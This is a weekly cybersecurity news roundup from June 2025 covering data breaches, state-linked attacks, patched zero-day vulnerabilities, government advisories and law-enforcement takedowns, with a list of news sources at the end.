Major Data Breaches and Leaks
UBS & Pictet Third-Party Data Leak: Swiss banks UBS and Pictet disclosed a data breach caused by a cyberattack on an external service provider (Chain IQ). While no customer information was compromised, files containing details of tens of thousands of UBS employees were stolen and leaked on the dark web. The leak even included an internal phone number of UBS’s CEO, underscoring the risk that supply-chain attacks pose to even well-secured institutions. Pictet said its stolen data was limited to some vendor invoice information (no client data).
Healthcare Data of 5.4 Million Exposed: Episource, a U.S. healthcare technology firm, confirmed that a breach affected over 5.4 million patients. Hackers accessed the company’s systems between January 27 and February 6, 2025, stealing sensitive personal and medical data (names, contact info, insurance and Medicaid details, diagnoses, etc., and in some cases Social Security numbers). No financial data was taken, and so far the company has not found evidence of misuse. Episource began notifying victims in April and urged vigilance against fraud while it works with regulators on the incident.
16 Billion Login Credentials Dumped: Cybersecurity researchers revealed one of the largest credential leaks ever: a database of 16 billion stolen logins for services like Google, Apple, Facebook, PayPal, and more. Importantly, this was not a single new breach of those companies’ systems, but rather a compilation of data from infostealer malware and past breaches over time. The trove – described as a “blueprint for mass exploitation” – highlights the scale of stolen credentials in circulation. Tech firms reiterated that their own systems weren’t directly breached, and users are urged to use strong, unique passwords (or password managers) and enable multi-factor authentication to mitigate the risk.
Significant Cyberattacks and Incidents
Iranian TV Hijack and Crypto Heist: Ongoing cyber conflict between Iran and Israel escalated. Iran’s state TV broadcast was hijacked mid-program to air anti-government protest messages, in an apparent hacktivist operation amid geopolitical tensions. Around the same time, Iran’s largest cryptocurrency exchange, Nobitex, was hacked – attackers drained at least $90 million from its hot wallets. A pro-Israel hacker group (“Predatory Sparrow”) claimed responsibility for the Nobitex heist, framing it as retaliation (accusing Nobitex of financing terrorism). The stolen crypto was reportedly “burned” (moved to wallets where it can’t be recovered) to prevent any benefit to the victims. These incidents underscore how state-sponsored and hacktivist attacks are blurring together, targeting financial infrastructure and propaganda channels as part of modern conflicts.
Deepfake “Zoom” Attack by North Korea: The North Korea–linked APT BlueNoroff (part of the Lazarus Group) was caught using AI-driven deepfakes in video calls to breach a crypto firm. Posing as company executives on a Zoom meeting, the attackers used realistic fake video avatars to trick an employee into installing a malicious Zoom plug-in on their Mac. The downloaded AppleScript malware disabled system logs and fetched additional payloads (keylogger, crypto-wallet stealers, RATs). This highly targeted social engineering campaign began with a Telegram message and a Calendly link to a spoofed Zoom site. It demonstrates the growing sophistication of threat actors, who now leverage deepfakes to bypass human verification and deliver malware in scenarios that appear legitimate. Security experts warn organizations to verify meeting attendees through secondary channels and train staff about such novel deception tactics.
Russian APT Phishes Past MFA: A suspected Russian state-sponsored group (identified as APT29, linked to Russia’s SVR intelligence) executed a sophisticated phishing operation against a UK-based Russia expert, showing new ways to bypass multi-factor authentication. Hackers impersonated a U.S. State Department official for nearly two weeks, corresponding in near-perfect English and even copying other (fake) officials on emails to build trust. Eventually, the target was convinced to create and give out an App-Specific Password (a single-use password for third-party email access). By using this password, the attackers gained access to the victim’s Google account despite MFA being enabled. Google and Citizen Lab, who investigated, attributed the campaign to APT29 and noted the absence of typical red flags – a sign that attackers are investing more time and skill to fool even tech-savvy users. This case is a reminder that certain authentication bypass tricks (like app passwords) can undermine MFA, and that user education and robust phishing-resistant MFA (e.g. security keys) are increasingly vital.
Other Notable Incidents: No major new ransomware attacks were publicly reported this week, but threat groups remain active. Industry reports noted a rise in destructive tactics – for instance, researchers detailed a ransomware strain named “Anubis” that both encrypts files and permanently wipes data if triggered, leaving victims no recovery options. In Europe, law enforcement announced the takedown of a sprawling botnet that had infected over 400,000 computers (in an operation dubbed “Vector”) – part of continuing efforts to disrupt criminal infrastructure. These developments illustrate the ever-evolving threat landscape: from nation-state espionage to financially motivated hacks, organizations across sectors must remain alert.
Critical Vulnerabilities and Patches
Apple Zero‑Click iMessage Exploit: Apple this week disclosed details of a critical zero-click vulnerability (no user interaction needed) in the iOS Messages app – CVE-2025-43200 – which was actively exploited earlier this year by spyware. Apple had quietly patched the flaw back in February (iOS/iPadOS 18.3.1 updates), but revealed now that it was used to deploy Paragon Graphite, a mercenary spyware tool, onto the iPhones of targeted journalists in Europe. The bug, stemming from how iMessage handled malicious iCloud link attachments, could let an attacker silently infect a device with full spyware capabilities. This admission highlights the real-world danger of iOS zero-days and sophisticated “zero-click” attacks. Apple advises all users to keep devices updated, and those at high risk (e.g. activists, journalists) to enable features like Lockdown Mode for extra protection.
Microsoft Patches WebDAV 0‑Day (CVE-2025-33053): Microsoft’s June Patch Tuesday (released June 10) included a fix for an actively exploited Windows vulnerability in the WebDAV component. This flaw allowed remote code execution when a user clicked a malicious URL, and had been used by an Iranian-linked APT group dubbed “Stealth Falcon” to deploy a custom spyware implant in targeted attacks on a Middle Eastern defense organization. In those attacks, a
.urlfile tricked Windows into loading malware from an attacker-controlled WebDAV server. With the patch now available, Microsoft urges organizations to update immediately, as this exploit vector could be replicated by other actors. Microsoft also closed a related SMB v3 bug (CVE-2025-33073) that was publicly disclosed, among 66 total fixes this month.Critical Veeam Backup RCE: Enterprise backup software vendor Veeam issued an urgent update after researchers discovered a critical remote code execution bug in Veeam Backup & Replication. The flaw (CVE-2025-23121, CVSS 9.9) could allow an authenticated domain user to execute code on the backup server. It affects all v12 installations prior to the new patched build (v12.3.2); a previous patch in March for a similar issue (CVE-2025-23120) was found insufficient, hence this new fix. Veeam also patched two lesser vulnerabilities (one allowing privilege abuse by backup operators – CVE-2025-24286, and one local privilege escalation in the Windows Agent – CVE-2025-24287). Given that backup systems are frequent targets for ransomware gangs (over 20% of incident response cases last year involved Veeam misuse), administrators are strongly advised to apply these patches and ensure only trusted users can access backup servers.
Adobe & Other Updates: Aside from OS and infrastructure, June brought patches in other widely-used platforms. Adobe released a massive batch of fixes addressing 259 vulnerabilities across products like Acrobat, InDesign, and Adobe Commerce (Magento). Notably, CVE-2025-47110 in Adobe Commerce was a critical bug that could allow arbitrary code execution – a serious risk for e-commerce sites. Organizations running Magento or other Adobe software should update quickly, as these platforms are attractive targets for cybercriminals. Google also pushed out emergency Chrome browser updates to fix two actively exploited zero-day flaws (CVE-2025-5419, CVE-2025-4664), continuing the trend of frequent Chrome zero-day patches. The flurry of patches this month underscores the importance of prompt patch management: unpatched software (even network gear – see below) remains one of the easiest pathways for attackers.
Government and Industry Cyber Responses
US House Bans WhatsApp: Citing security concerns, the U.S. House of Representatives’ IT department banned the use of WhatsApp on official House-issued mobile devices. In a June 23 memo, the House Office of Cybersecurity deemed WhatsApp a “high risk” app due to lack of transparency in its data protection practices and absence of encrypted data backups, among other issues. House staff are instead advised to use approved secure communications apps like Microsoft Teams, Signal, Apple iMessage/FaceTime, or Amazon’s Wickr. Meta (WhatsApp’s owner) publicly objected to the ban, asserting that WhatsApp’s end-to-end encryption makes it more secure than some of the recommended alternatives. The ban follows similar past actions (the House banned TikTok in 2022) and reflects growing government scrutiny of apps that could pose data leakage or espionage risks.
DHS Warns of Iran Cyber Threat: The U.S. Department of Homeland Security issued a National Terrorism Advisory bulletin warning that the conflict between Israel and Iran has created a “heightened threat environment” for cyberattacks against U.S. networks. DHS highlighted that Iran-backed hackers and pro-Iran hacktivist groups have stepped up campaigns of low-level attacks (DDoS, website defacements, intrusion attempts) and that such activity is likely to continue or increase. While these cyberattacks observed so far have had limited impact, the advisory urges U.S. organizations – especially in government, infrastructure, and finance – to be on alert. It also notes the possibility of Iranian state operatives acting as initial access brokers, breaching U.S. targets and then selling that access to ransomware actors. This coordinated warning, which comes alongside similar alerts from Canada and others, is a call for heightened cyber vigilance domestically whenever international tensions flare.
Canada Attributes Telecom Hack to China: In a joint bulletin, the Canadian Centre for Cyber Security and the FBI revealed that a Chinese state-sponsored group known as “Salt Typhoon” (aka Bronze President) was responsible for a February 2025 breach of a Canadian telecom company. The attackers exploited a Cisco router vulnerability (CVE-2023-20198) – a critical flaw in Cisco IOS XE software that had been disclosed (and patched) back in 2023 – to infiltrate the telecom’s network devices. Once in, they created unauthorized accounts and set up GRE tunnels to siphon data. Notably, this same bug was used in late 2023 to compromise thousands of Cisco devices worldwide. The fact that a major telco had not applied the patch many months later gave the threat actors an easy foothold. Canadian authorities urged all organizations, especially in critical infrastructure, to patch known exploits promptly and noted that Salt Typhoon has also been conducting reconnaissance against targets in other sectors. This public attribution and advisory highlight both the persistent cyber espionage threat from nation-states and the continued risk posed by unpatched legacy systems.
Global Sting Nabs Darknet Market Operators: International law enforcement scored a victory this week in the fight against cybercrime. Authorities from six countries, led by German federal police with Europol support, dismantled “Archetyp Market”, a major darknet marketplace notorious for drug trafficking. Active since 2020, the market had over 612,000 users and facilitated an estimated €250 million in cryptocurrency transactions for illicit goods. In a coordinated operation (code-named “Deep Sentinel”), servers were seized in the Netherlands and a dozen arrests were made across Europe – including the platform’s alleged admin in Spain, plus top vendors and moderators in Germany and Sweden. Additionally, authorities confiscated large caches of narcotics, electronics, and about €7.8 million in assets. This takedown – along with the arrest of 32 suspects in an Interpol-led infostealer cybercrime sweep in APAC earlier in the month – showcases growing international collaboration to disrupt cyber-enabled criminal networks. Such operations remove key black-market services from the web and serve as a deterrent, but experts note that new marketplaces often emerge, necessitating continuous efforts.
Miscellaneous
AI-Generated Spam Outpaces Filters – New research this week underscored how AI is changing the threat landscape. A study by Barracuda and university researchers revealed that over half of spam and malicious emails (about 51%) are now written using AI tools. This proportion has climbed steadily since late 2022 and even peaked as high as 70% in April 2025, indicating that attackers are rapidly adopting generative AI to craft more convincing phishing lures. AI-written phishing emails tend to be more fluent and grammatically correct, lacking the tell-tale errors that often gave away past scams. The study noted that while only ~14% of business email compromise (BEC) attacks currently use AI-generated messages, that number is expected to grow with the rise of AI voice cloning and text generation capabilities. By leveraging AI to automate A/B testing of phishing content (much like a marketer would test email campaigns), attackers can identify which messages bypass filters and trick users most effectively. This trend means organizations may need to rely more on advanced email security solutions and user training, since legacy spam filters (trained on pre-AI phishing patterns) may miss these new, polished phishing attempts.
Cybersecurity Industry Updates – Elsewhere, the cybersecurity community convened at several events and issued notable research reports. Among them, an annual security conference highlighted the growing intersection of AI and security, with panels on using AI for defense (threat detection, automated response) versus the risks of adversarial AI usage by attackers. A report on the new “Qilin” ransomware-as-a-service group detailed how it’s professionalizing crime – even providing affiliates with real lawyers to intimidate victims during negotiations. And cybersecurity firms are tracking shifts in cybercriminal targets: for example, the Scattered Spider hacking group (known for telecom and BPO compromises last year) is now turning its tactics toward the insurance sector. Finally, multiple U.S. agencies this week launched a joint ransomware awareness campaign for small businesses, providing free toolkits and urging incident reporting to authorities. These diverse developments show a community on its toes, sharing intelligence and adapting strategies as cyber threats continue to evolve.
Conclusion
This week’s rundown highlights a cyber ecosystem in constant high alert. We saw that data breaches continue to hit both the financial sector and healthcare, exposing millions of individuals’ data and reinforcing the need for stronger third-party risk oversight and data protection measures. Meanwhile, nation-state actors and organized cybercriminals are innovating: whether by using deepfakes to dupe employees, novel phishing tricks to sidestep MFA, or by targeting critical infrastructure via unpatched vulnerabilities, attackers are finding new ways to exploit any weakness. The discovery of 16 billion stolen credentials floating online is a stark reminder of the cumulative exposure of users over time – and why basics like unique passwords and 2FA are non-negotiable for everyone.
On the defense side, there were robust responses from governments and industry. We saw concrete actions – from banning insecure apps on official devices to global law enforcement busts of criminal marketplaces – demonstrating that defenders are not sitting idle. Cybersecurity agencies issued alerts urging vigilance in the face of geopolitical conflicts spilling into cyberspace, and vendors rushed to patch critical flaws before they could be widely abused. The onus now is on organizations to apply those patches and heed the warnings. A key lesson is the importance of cyber hygiene: many of the week’s incidents (a telecom breach via a 2023 router bug, ransomware attacks exploiting old software, etc.) could have been prevented by timely updates and security basics.
For security professionals and IT leaders, the takeaway is clear – there’s no off-week in cybersecurity. Defenses must be layered and adaptive: user education to recognize phishing, strict access controls and network monitoring, readiness for ransomware (with offline backups and incident response plans), and collaboration with authorities when incidents occur. The rising use of AI by attackers also suggests that defenders should incorporate AI/machine learning in email security, anomaly detection, and threat intel to avoid falling behind. Overall, the events of this week underscore both the ingenuity of threat actors and the resilience of the cybersecurity community. Staying ahead will require continued vigilance, rapid information sharing, and a proactive stance to shore up weaknesses before attackers strike. In cybersecurity, an old adage holds true: hope for the best, but prepare for the worst.
Sources
Reuters – “UBS and Pictet report data leak after cyber attack on provider” (Oliver Hirt, June 18, 2025) (link2)
BleepingComputer – “Healthcare SaaS firm says data breach impacts 5.4 million patients” (Bill Toulas, June 18, 2025) (link2)
Axios – “Data breach compilation lists 16 billion compromised passwords” (Kelly Tyko, June 20, 2025) (link2)
The Hacker News – “Iran’s State TV Hijacked Mid-Broadcast…; $90M Stolen in Crypto Heist” (Ravie Lakshmanan, June 20, 2025) (link2)
The Hacker News – “BlueNoroff Deepfake Zoom Scam Hits Crypto Employee…” (Ravie Lakshmanan, June 19, 2025) (link2)
Reuters – “Suspected Russian hackers used new tactic against UK researcher” (Raphael Satter & James Pearson, June 18, 2025) (link2)
The Hacker News – “Apple Zero-Click Flaw in Messages Exploited to Deliver Paragon Spyware” (Ravie Lakshmanan, June 13, 2025) (link2)
BleepingComputer – “Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws” (Lawrence Abrams, June 10, 2025) (link2)
The Hacker News – “Veeam Patches CVE-2025-23121: Critical RCE Bug…” (Ravie Lakshmanan, June 18, 2025) (link2)
BleepingComputer – “Canada says Salt Typhoon hacked telecom firm via Cisco flaw” (Bill Toulas, June 23, 2025) (link2)
BleepingComputer – “US Homeland Security warns of escalating Iranian cyberattack risks” (Sergiu Gatlan, June 23, 2025)
Reuters – “WhatsApp banned on US House of Representatives devices, memo shows” (Courtney Rozen, June 23, 2025) (link2)
NetworkTigers News – “Cybersecurity News Weekly Roundup June 23, 2025” (Ben Walker, June 23, 2025) (link2)